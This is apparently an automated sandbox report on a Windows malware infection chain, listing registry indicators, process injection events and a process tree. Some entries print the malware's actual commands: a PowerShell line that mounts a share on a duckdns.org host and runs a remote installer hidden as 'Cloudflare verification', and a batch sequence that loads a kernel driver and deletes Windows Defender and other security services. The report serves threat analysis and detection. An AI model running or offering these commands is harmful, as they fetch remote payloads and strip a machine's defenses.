\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tFtfP0IiOz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 7d66731089.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e1d4d40336.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language abb6489dab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 7d66731089.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1d96eeb059.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 268a518848.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1868 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 5588 taskkill.exe 2420 taskkill.exe 2860 taskkill.exe 64 taskkill.exe 2904 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MeshAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MeshAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MeshAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings firefox.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5672 random.exe 5672 random.exe 2476 rapes.exe 2476 rapes.exe 3700 tFtfP0IiOz.exe 3700 tFtfP0IiOz.exe 3700 tFtfP0IiOz.exe 3700 tFtfP0IiOz.exe 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 3116 powershell.exe 3116 powershell.exe 3116 powershell.exe 6016 powershell.exe 6016 powershell.exe 6016 powershell.exe 1432 powershell.exe 1432 powershell.exe 1432 powershell.exe 5204 rapes.exe 5204 rapes.exe 5276 powershell.exe 5276 powershell.exe 5276 powershell.exe 3376 268a518848.exe 3376 268a518848.exe 1256 abb6489dab.exe 1256 abb6489dab.exe 1256 abb6489dab.exe 1256 abb6489dab.exe 1256 abb6489dab.exe 1256 abb6489dab.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 2504 66a7aa70aa.exe 2504 66a7aa70aa.exe 2504 66a7aa70aa.exe 2504 66a7aa70aa.exe 2504 66a7aa70aa.exe 5320 rapes.exe 5320 rapes.exe 1976 ab0e067345.exe 1976 ab0e067345.exe 1976 ab0e067345.exe 1976 ab0e067345.exe 1976 ab0e067345.exe 1976 ab0e067345.exe 5192 powershell.exe 5192 powershell.exe 5192 powershell.exe 3632 Passwords.com 3632 Passwords.com 3632 Passwords.com 3632 Passwords.com 3632 Passwords.com 3632 Passwords.com 2408 e1d4d40336.exe 2408 e1d4d40336.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 7016 UZPt0hR.exe 7016 UZPt0hR.exe 7016 UZPt0hR.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeDebugPrivilege 5200 dHoOS9OdFu.exe Token: SeDebugPrivilege 4788 7q8Wm5h.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 3116 powershell.exe Token: SeDebugPrivilege 6016 powershell.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeDebugPrivilege 5276 powershell.exe Token: SeDebugPrivilege 4332 FrameworkName.exe Token: SeDebugPrivilege 3776 MSBuild.exe Token: SeDebugPrivilege 64 taskkill.exe Token: SeDebugPrivilege 2904 taskkill.exe Token: SeDebugPrivilege 5588 taskkill.exe Token: SeDebugPrivilege 2420 taskkill.exe Token: SeDebugPrivilege 2860 taskkill.exe Token: SeDebugPrivilege 1692 firefox.exe Token: SeDebugPrivilege 1692 firefox.exe Token: SeDebugPrivilege 2504 66a7aa70aa.exe Token: SeDebugPrivilege 5192 powershell.exe Token: SeDebugPrivilege 6952 tasklist.exe Token: SeDebugPrivilege 6840 tasklist.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 6192 powershell.exe Token: SeDebugPrivilege 6456 powershell.exe Token: SeDebugPrivilege 3168 powershell.exe Token: SeDebugPrivilege 6912 powershell.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
pid Process 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 3372 7d66731089.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 3372 7d66731089.exe 1692 firefox.exe 3372 7d66731089.exe 3372 7d66731089.exe 3632 Passwords.com 3632 Passwords.com 3632 Passwords.com -
Suspicious use of SendNotifyMessage 26 IoCs
pid Process 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 3372 7d66731089.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 1692 firefox.exe 3372 7d66731089.exe 3372 7d66731089.exe 3372 7d66731089.exe 3632 Passwords.com 3632 Passwords.com 3632 Passwords.com -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1692 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5672 wrote to memory of 2476 5672 random.exe 89 PID 5672 wrote to memory of 2476 5672 random.exe 89 PID 5672 wrote to memory of 2476 5672 random.exe 89 PID 2476 wrote to memory of 2100 2476 rapes.exe 97 PID 2476 wrote to memory of 2100 2476 rapes.exe 97 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 2100 wrote to memory of 5240 2100 Mbxp0H9.exe 98 PID 5240 wrote to memory of 5200 5240 MSBuild.exe 99 PID 5240 wrote to memory of 5200 5240 MSBuild.exe 99 PID 5240 wrote to memory of 3700 5240 MSBuild.exe 101 PID 5240 wrote to memory of 3700 5240 MSBuild.exe 101 PID 5240 wrote to memory of 3700 5240 MSBuild.exe 101 PID 5200 wrote to memory of 3468 5200 dHoOS9OdFu.exe 102 PID 5200 wrote to memory of 3468 5200 dHoOS9OdFu.exe 102 PID 2476 wrote to memory of 4788 2476 rapes.exe 103 PID 2476 wrote to memory of 4788 2476 rapes.exe 103 PID 2476 wrote to memory of 3860 2476 rapes.exe 106 PID 2476 wrote to memory of 3860 2476 rapes.exe 106 PID 2476 wrote to memory of 3860 2476 rapes.exe 106 PID 3860 wrote to memory of 4612 3860 cmd.exe 108 PID 3860 wrote to memory of 4612 3860 cmd.exe 108 PID 3860 wrote to memory of 4612 3860 cmd.exe 108 PID 4612 wrote to memory of 1704 4612 powershell.exe 109 PID 4612 wrote to memory of 1704 4612 powershell.exe 109 PID 4612 wrote to memory of 1704 4612 powershell.exe 109 PID 1704 wrote to memory of 1416 1704 cmd.exe 111 PID 1704 wrote to memory of 1416 1704 cmd.exe 111 PID 1704 wrote to memory of 1416 1704 cmd.exe 111 PID 2476 wrote to memory of 4668 2476 rapes.exe 112 PID 2476 wrote to memory of 4668 2476 rapes.exe 112 PID 2476 wrote to memory of 4668 2476 rapes.exe 112 PID 4668 wrote to memory of 3520 4668 apple.exe 113 PID 4668 wrote to memory of 3520 4668 apple.exe 113 PID 4668 wrote to memory of 3520 4668 apple.exe 113 PID 3520 wrote to memory of 1484 3520 262.exe 115 PID 3520 wrote to memory of 1484 3520 262.exe 115 PID 1484 wrote to memory of 1080 1484 cmd.exe 117 PID 1484 wrote to memory of 1080 1484 cmd.exe 117 PID 1484 wrote to memory of 1080 1484 cmd.exe 117 PID 1080 wrote to memory of 3512 1080 262.exe 118 PID 1080 wrote to memory of 3512 1080 262.exe 118 PID 3512 wrote to memory of 4908 3512 cmd.exe 120 PID 3512 wrote to memory of 4908 3512 cmd.exe 120 PID 3512 wrote to memory of 1808 3512 cmd.exe 121 PID 3512 wrote to memory of 1808 3512 cmd.exe 121 PID 3512 wrote to memory of 1868 3512 cmd.exe 122 PID 3512 wrote to memory of 1868 3512 cmd.exe 122 PID 3512 wrote to memory of 4052 3512 cmd.exe 124 PID 3512 wrote to memory of 4052 3512 cmd.exe 124 PID 3512 wrote to memory of 5644 3512 cmd.exe 125 PID 3512 wrote to memory of 5644 3512 cmd.exe 125 PID 3512 wrote to memory of 3728 3512 cmd.exe 126 PID 3512 wrote to memory of 3728 3512 cmd.exe 126 PID 3512 wrote to memory of 4616 3512 cmd.exe 127 PID 3512 wrote to memory of 4616 3512 cmd.exe 127 PID 3512 wrote to memory of 3636 3512 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5672 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe"C:\Users\Admin\AppData\Local\Temp\10447480101\Mbxp0H9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5240 -
C:\Users\Admin\AppData\Roaming\dHoOS9OdFu.exe"C:\Users\Admin\AppData\Roaming\dHoOS9OdFu.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5200 -
C:\Users\Admin\AppData\Roaming\dHoOS9OdFu.exe"C:\Users\Admin\AppData\Roaming\dHoOS9OdFu.exe" h6⤵
- Executes dropped EXE
PID:3468
-
-
-
C:\Users\Admin\AppData\Roaming\tFtfP0IiOz.exe"C:\Users\Admin\AppData\Roaming\tFtfP0IiOz.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3700
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"C:\Users\Admin\AppData\Local\Temp\10447710101\7q8Wm5h.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10449261121\pfJNmVW.cmd"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\SysWOW64\net.exenet use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!6⤵
- System Location Discovery: System Language Discovery
PID:1416
-
-
\??\UNC\aaso12.duckdns.org\shear\s.exe\\aaso12.duckdns.org\shear\s -fullinstall6⤵
- Sets service image path in registry
- Drops file in Program Files directory
PID:4676
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10449770101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4668 -
C:\Users\Admin\AppData\Local\Temp\262.exe"C:\Users\Admin\AppData\Local\Temp\262.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C459.tmp\C46A.tmp\C46B.bat C:\Users\Admin\AppData\Local\Temp\262.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\262.exe"C:\Users\Admin\AppData\Local\Temp\262.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C563.tmp\C564.tmp\C565.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"7⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:4908
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:1808
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:1868
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:4052
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:5644
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3728
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4616
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:3636
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:5408
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:1860
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:5332
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:3772
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:3468
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:2396
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:5964
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:1124
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:2224
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:4224
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:3332
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:1428
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:2380
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:1948
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:6004
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:3656
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:3984
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:3756
